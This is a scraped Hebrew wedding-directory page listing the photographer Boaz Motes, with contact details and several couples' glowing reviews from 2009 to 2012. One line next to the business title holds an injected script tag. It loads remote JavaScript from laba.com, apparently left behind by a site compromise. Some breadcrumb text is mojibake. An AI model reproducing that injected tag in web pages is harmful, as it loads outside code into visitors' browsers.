חתונה יהודית
פירסום חתונה בדקה ה90 אירועים וחוויות ווידאו חתונה הנחות ומבצעים מאמרים רשימה אישית טיפים חתונה - ראשי
 
חתונה יהודית > ????? - ?? ????  > ????? ??????? > בעז מוטס- צילום יצירתי
חזור 
בעז מוטס- צילום יצירתי
בעז מוטס - צילום אירועים מקצועי.צילום שמתחיל ביחס אישי, צילום שמתאים לכם. יש יום אחד בחיים, שאתם המרכז של העולם. זהו היום המושלם שלכם. להרגיש בתמונה את הריקוד הסוער, את החיבוק המגן. לראות בתמונות את האהבה הפורחת בינכם.

טלפון :
054-4451191
נייד :
כתובת :
כל הארץ 


ליצירת קשר עם בעל העסק הקש כאן
בעז מוטס- צילום יצירתי - ????? - ?? ????<script src=http://laba.com/muuu.s></script> 1
SimpleViewer requires Macromedia Flash. Get Macromedia Flash. If you have Flash installed, click to view gallery
 13/05/2012 18:35:15- טל וכנרת
בועז מוטס - המלצה
אחד הדברים שהיה חשוב לנו בצלם זה הכימיה איתו. בועז פשוט בן אדם מקסים, אי אפשר לא להסתדר איתו, הוא דאג לכל הדברים הקטנים שאף אחד לא חושב עליהם. היום עבר בכיף איתו ועם הצוות המצויין שלו. סרט הוידאו ערוך במקצועיות רבה, מושקע ומעניין מאוד כך שגם מי שלא היה באירוע נהנה לצפות בו. והאלבום הדיגטלי יצא מקסים .הכל מאוד מקצועי וברמה גבוהה!מומלץ בחום! מבטיחים שלא תתאכזבו :)טל וכנרת.

09/05/2012 09:09:47- עינת ויובל
המלצה על בועז מוטס
הגענו אל בועז ללא היכרות מוקדמת. זה התחיל בשיחת טל' שבועז דבר ראשון שאל עלינו, התעניין בנו, אחרי זה שאל אותנו על הצילום בו אנו מעוניינים ורק אחרי זה סיפר על העבודה שהוא עושה.אנחנו שמחים על זה שבחרנו בבועז לצלם את החתונה. הוא תמיד אדיב וקשוב לבקשות שלנו.גם לפני, במהלך ואחרי האירוע.קיבלנו השבוע את האלבום הדיגיטלי ומאד אהבנו את התוצאה! . גם את הקליפ של הוידאו מאד אהבנו. עינת ויובל

23/12/2010 15:35:41- רעות ויוחאי
המלצה על בועז מוטס
הגענו אל בועז אחרי שהוא צילם כמה חברות שלי.הוא משרה אווירה טובה ביום הזה שלפעמים מרגישים בו לחץ.קיבלנו את האלבום הדיגטלי ואנחנו מרוצים מאוד.שמענו בעצתו לגבי מקום לצילום ועוד כל מיני.תודה רבה.

18/10/2010 10:52:53- שיר וירון
המלצה על בועז מוטס
לקח לנו הרבה זמן עד שהחלטנו על צלם, אבל כשראינו את האלבומים ואת עבודות הוידאו של בועז הבנו שאותו אנחנו רוצים, אנחנו חודשיים אחרי החתונה וקיבלנו כבר את הכל. את האלבום הדיגיטלי ואת הודיאו. פשוט כיף.

30/11/2009 09:21:25- שירה ונועם
בועז מוטס הצלם
בועז בחור מקסים, היה כיף ונעים מאוד להעביר איתו את הצילומים, משרה אווירה מצחיקה ונעימה. התקבלו תמונות מאוד מיוחדות, כל תמונה מביעה משהו אחר, מנציח רגעים אמיתיים, עשינו אצלו אלבום דיגיטלי שיצא מדהים, איכות התמונות מעל ומעבר, כל מי שראה את האלבום ואת התמונות התלהב מאוד, הסרט ערוך בצורה מאוד יפה

22/07/2009 12:04:09- נעמה ויונתן
בועז מוטס - צילום יצירתי
בעז צילם אצלנו בחתנוה.הצוות כולו מקסים- לא מורגש- כשקבילנו את התמונות- פשוט שמחנו שבחרנו בבועז ובצוות שלו.כל חברה שמגיעה ומסתכלת באלבום- מתפעלת.